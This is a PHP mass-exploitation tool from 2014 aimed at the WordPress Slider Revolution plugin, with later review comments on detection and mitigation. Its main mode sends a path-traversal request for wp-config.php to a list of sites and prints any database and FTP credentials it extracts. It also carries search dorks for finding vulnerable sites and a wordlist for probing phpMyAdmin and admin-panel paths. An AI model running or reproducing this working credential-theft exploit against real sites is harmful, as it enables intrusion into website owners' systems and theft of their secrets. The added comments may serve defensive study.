
Mass Revslider Plugin Exploiting v1

Author: AMir dZ 52 , Published: 22-09-2014
<?
// Emits the tool's static HTML shell: page colours and CSS, a banner image loaded
// from a remote URL, and a menu. Each menu link reloads this same script with a
// different value of the `dz` query parameter (scan, exp, db, dorks, toip), which
// the conditionals further down use to select a mode.
echo"
<body bgcolor='#000000' text='white'>
<title>Mass Revslider Exl0it1ng</title>
<style>
body,table{background: black; }
A:link {text-decoration: none;color: red;}
A:active {text-decoration: none;color: red;}
A:visited {text-decoration: none;color: red;}
A:hover {text-decoration: underline; color: red;}
#new,input,textarea,table,td,tr,#gg
{
border-style:solid;
text-decoration:bold;
}
input:hover,tr:hover,td:hover,textarea:hover
{
background-color: #FFFFCC;
color:green;
size:10px;
}
</style>
<center><img src='https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcSjfAs7Cqc8Gq6GTxefRk9Tt0gcWFS2B1kIgYFBs8H24UuC3UYMoA' height='150' width='150'></img><br>
<!--- Menu -----!--->
<p align='center' dir='ltr'>
<font face='Verdana' size='2' color='#FFFFFF'>#
<a href='?dz=scan' style='text-decoration: none'><font color='#006699'>IP Scanner</font></a> ~
<a href='?dz=exp' style='text-decoration: none'><font color='#006699'>Exploiter</font></a> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=db' style='text-decoration: none'><font color='#006699'>Find DB Panel</font></a><font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=dorks' style='text-decoration: none'><font color='#006699'>Exploit Dorks</font></a></font>



<font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=toip' style='text-decoration: none'><font color='#006699'>Domains 2 IP</font></a></font>



<font face='Verdana' size='2' color='#FFFFFF'> # </font>
<br><br>
";


/////////////////////////////////
// "exp" mode. Reads a list of site base URLs from the POSTed `sites` field and,
// for each entry, requests the Slider Revolution (revslider) AJAX action
// `revslider_show_image` with `img=../wp-config.php`, i.e. a path-traversal read
// of the WordPress configuration file. It then prints whatever credentials it
// can cut out of the response.
//
// Defender notes (review):
//  - Detection: the traffic is a GET to /wp-admin/admin-ajax.php carrying
//    action=revslider_show_image and an img value that contains "../" and names
//    a .php file. That combination in web-server or WAF logs is a strong
//    indicator of this tool or a variant of it.
//  - Impact: a response containing wp-config.php exposes the database name,
//    user, password and host (and FTP credentials when the site defines them
//    there). After a confirmed hit, rotate those credentials and the WordPress
//    auth keys/salts stored in the same file.
//  - Mitigation: update the plugin, including copies bundled inside themes, and
//    reject traversal sequences in the img parameter at the WAF/reverse proxy.
if ($_GET['dz'] == 'exp') {
echo"<form method='post'>
<textarea name='sites' cols='50' rows='12'></textarea><br>
<input type='submit' name='go' value='Exploit'>
</form>";
// Returns the part of $mytext that lies between the first case-insensitive
// occurrence of $starttag and the next occurrence of $endtag after it.
// The stripos() results are not checked for false, so when a tag is absent the
// returned slice is not meaningful.
function findit($mytext,$starttag,$endtag) {
$posLeft = stripos($mytext,$starttag)+strlen($starttag);
$posRight = stripos($mytext,$endtag,$posLeft+1);
return substr($mytext,$posLeft,$posRight-$posLeft);
}
// All PHP diagnostics are silenced and the execution time limit is removed, so
// a long list is processed to the end without any visible errors.
error_reporting(0);
set_time_limit(0);
$ya=$_POST['go'];
$co=$_POST['sites'];

if($ya){
// The list is split on CRLF only; each element is used as-is as a URL prefix.
$e=explode("\r\n",$co);
foreach($e as $bda){
//echo '<br>'.$bda;
/// you can devlope the tool ///
// Fixed request path: this string is the network signature to match on.
$linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
$dn=($bda).($linkof);
// "@" hides fetch warnings; a failed request leaves $file as false.
$file=@file_get_contents($dn);
// NOTE(review): eregi() was removed in PHP 7, so the script as published
// depends on a PHP 5.x runtime.
// Case 1: response mentions DB_HOST but not FTP_USER -> treated as a leaked
// wp-config.php and the four DB_* define() values are printed.
if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
echo "<font face=Verdana size=-2 color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
echo "<font face=Verdana size=-2 color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
echo "<font face=Verdana size=-2 color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
echo "<font face=Verdana size=-2 color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
}
// Case 2: response mentions both DB_HOST and FTP_USER -> only the FTP_* values
// are printed in this branch.
elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
echo "<font face=Verdana size=-2 color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
echo "<font face=Verdana size=-2 color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
echo "<font face=Verdana size=-2 color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
}
// Case 3: no DB_HOST in the response (or the request failed) -> reported as
// "Not Infected". "Infected" in this tool's output therefore means "the file
// read succeeded", not that malware was found on the site.
else{
echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
echo "<center><font color=yellow face=Verdana size=-2>".$bda."</font><font color=white face=Verdana size=-2> ==> </font><font color=red face=Verdana size=-2>Not Infected ! </font></center>";}
echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
}

}
}
/////////////////////////////////////

/////////////////////////////////////
// "dorks" mode. Prints a static list of search-engine queries that match
// revslider plugin paths and open directory listings; no request is made from
// this branch.
//
// Defender notes (review): the list shows what makes an installation easy to
// find, namely indexed plugin paths and "Index Of" directory listings. Turning
// off directory listings and checking whether your own domains appear for these
// patterns reduces that exposure; it does not replace patching the plugin.
if ($_GET['dz'] == 'dorks') {
echo'<br><textarea cols=50 rows=12 >
inurl:wp-content/plugins/revslider/
inurl:revslider
inurl:revslider_admin.php
inurl:revslider_front.php
inurl:plugins/revslider/
intext:Powered by Revslider
intitle:"Index Of/ revslider"
intitle:"Index Of/wp-content/themes/revslider"
intitle:"Index Of/wp-content/plugins/revslider"
intitle:"Index Of/admin/revslider"
intitle:"Index Of/fr/revslider"
intitle:"Index Of/en/revslider"
intitle:"Index Of/us/revslider"
intitle:"Index Of/ar/revslider"
intitle:"Index Of/es/revslider"
intitle:"Index Of/de/revslider"
</textarea>';

}
//////////////////////////////////////

//////////////////////////////////////
// "toip" mode. Takes a newline-separated list of host names from the POSTed
// `site2ip` field and prints each one next to the result of gethostbyname().
// The lookup is performed by the server running this script, so the DNS queries
// originate from that host.
if ($_GET['dz'] == 'toip') {
echo"
<form method='post' ><center>
<textarea cols='50' rows='12' name='site2ip' >www.example.com
Please Romove http:// or https://</textarea></br><br>
<input type='submit' name='w2ip' value='Extract' ><br>
</center>";
if(isset($_POST['site2ip'])){
foreach(explode("\n",$_POST['site2ip']) as $site4ip){
// trim() also strips the "\r" left over from CRLF line endings.
$ipp=trim($site4ip);
// gethostbyname() returns its input unchanged when resolution fails, so an
// unresolved name is printed as "name ==> name". Both values are echoed
// without HTML escaping.
echo '<font color="red" size="3"></font><font color="green" size="5"><center>
<font color="Blue" size="3"</font><font color=Green face=Verdana size=-2>'.$ipp.'</font>
<font color=white face=Verdana size=-2> ==> </font> <font color=Green face=Verdana size=-2>'.gethostbyname ($ipp).'</font></center></font>';
}
}
}
////////////////////////////////////

////////////////////////////////////
// "db" mode. Appends each entry of a fixed wordlist of database-admin and
// admin-panel paths to the POSTed `site` value, fetches the result with cURL,
// and reports paths whose response text contains "200 OK" or "401 Unauthorized".
//
// Defender notes (review):
//  - Detection: this produces one request per wordlist entry against a single
//    host in quick succession, in the order listed below, and most of them will
//    normally end in 404. A run of requests for versioned /phpMyAdmin-2.x.y/
//    directories followed by /DB1/../DATABASE9/-style names is characteristic.
//  - Mitigation: do not publish database administration panels on the public
//    site; restrict them by network (VPN / allow-list) and require
//    authentication in front of them, and rate-limit repeated 404s per client.
if ($_GET['dz'] == 'db') {


echo'
<form action ="" method="post">
<font face=Verdana size=-2 color=wgite >URL : <input type ="text" name="site"/>
<input type = "submit" value="Find" />
</form>';
// Base URL to probe, taken directly from the form with no validation.
$site = $_POST['site'];
// Candidate paths. The list contains duplicates (for example '/phpmyadmin/' and
// '/webadmin/' appear twice), so some paths are requested more than once.
$list = array(
'/phpMyAdmin/',
'/phpmyadmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/DB_ADMIN/',
'/db_admin/',
'/DBA/',
'/SQLI/',
'/dba/',
'/sqli/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/dev/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
'/mya/',
'/PhpMyAdmin/',
'/phpmyadmin/',
'/myadmin/',
'/mysql/',
'/sql/',
'/server/',
'/db/',
'/database/',
'/databases/',
'/adm/',
'/configuration/',
'/configure/',
'/administrator/',
'/login/',
'/moderator/',
'/controlpanel/',
'/adminpanel/',
'/admincontrol/',
'/fileadmin/',
'/data/',
'/postgresql/',
'/oracle/',
'/msssql/',
'/msaccess/',
'/sysadmin/',
'/serverdata/',
'/webadmin/',
'/admins/',
'/Database_Administration/',
'/WebAdmin/',
'/useradmin/',
'/sysadmins/',
'/admin1/',
'/system-administration/',
'/administrators/',
'/pgadmin/',
'/directadmin/',
'/staradmin/',
'/ServerAdministrator/',
'/SysAdmin/',
'/administer/',
'/LiveUser_Admin/',
'/sys-admin/',
'/typo3/',
'/panel/',
'/xlogin/',
'/smblogin/',
'/phpldapadmin/',
'/server_admin/',
'/database_administration/',
'/system_administration/',
'/ss_vms_admin_sm/',
'/adminarea/',
'/MySQL/',
'/mysql_admin/',
'/server_data/',
'/DB/',
'/DB1/',
'/DB2/',
'/DB3/',
'/DB4/',
'/DB5/',
'/DB6/',
'/DB7/',
'/DB8/',
'/DB9/',
'/DB0/',
'/db1/',
'/db2/',
'/db3/',
'/db4/',
'/db5/',
'/db6/',
'/db7/',
'/db8/',
'/db9/',
'/db0/',
'/mysql5/',
'/mysql4/',
'/root/',
'/apache/',
'/php/',
'/Apache/',
'/Php/',
'/apach/',
'/apachepanel/',
'/WEBSERVERS/',
'/DATABASE1/',
'/DATABASE2/',
'/DATABASE3/',
'/DATABASE4/',
'/DATABASE5/',
'/DATABASE6/',
'/DATABASE7/',
'/DATABASE8/',
'/DATABASE9/',
'/WEBDATA/',
'/WEB_DATA/',
'/webservers/',
'/database1/',
'/database2/',
'/database3/',
'/database4/',
'/database5/',
'/database6/',
'/database7/',
'/database8/',
'/database9/',
'/webdata/',
'/web_data/',
);

// True whenever the form field was submitted, including as an empty string.
if(isset($site)){

// $path is the numeric array index and is not used; $test is the path string.
foreach($list as $path => $test) {
// One fresh cURL handle per path. The response is captured as a string with the
// headers included; no other cURL options are set in this block.
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $site.$test);
$result = curl_exec($ch);
curl_close($ch);
//print $url;
// The status is detected by searching the whole captured text (headers and
// body) for the literal strings below.
if (preg_match("/200 OK/", $result)){
echo "<b><font face=Verdana size=-2 color=green >[+]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font></b>";
}
// For a 401 both lines in this branch are printed ("Found" and "Nothing
// found"); responses that match neither pattern print nothing.
else if (preg_match("/401 Unauthorized/", $result)) {
echo "<b><font face=Verdana size=-2 color=yellow >[!]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[ $site$test ]</A></font></b>";
echo "<b><font face=Verdana size=-2 color=red >[-]</font><font face=Verdana size=-2 color=silver > Nothing found on </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[$site$test]</a></font>";
}
}
echo "<br><b><u><font face=Verdana size=-2 color=#513912 >Scan Finished !</font></u></b>";
}


}
////////////////////////////////////





// "scan" mode. Placeholder only: despite the "IP Scanner" menu label, this
// branch performs no scanning and just prints a message asking for contributions.
if ($_GET['dz'] == 'scan') {

echo "<br><b><u><font face=Verdana size=-2 color=#513912 >You can Devlope the Wp IP Scanner or start you idea here and send to <a href=http://dz-amir@hotmail.com >dz-amir@hotmail.com </a> ....</font></u></b>";
}




?>



<center>
<code style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:center; border-top: 0px solid #FF3300; border-bottom: 1px solid #FF3300">
<font color=#FF3300 size=1 face="Tahoma">Mass Revslider Plugin Exl0it1ng v1<font><font color=white size=1 face="Tahoma"> -</font><font color=gren size=1 face="Tahoma"> By AMir dZ 52</font></code>
</center>
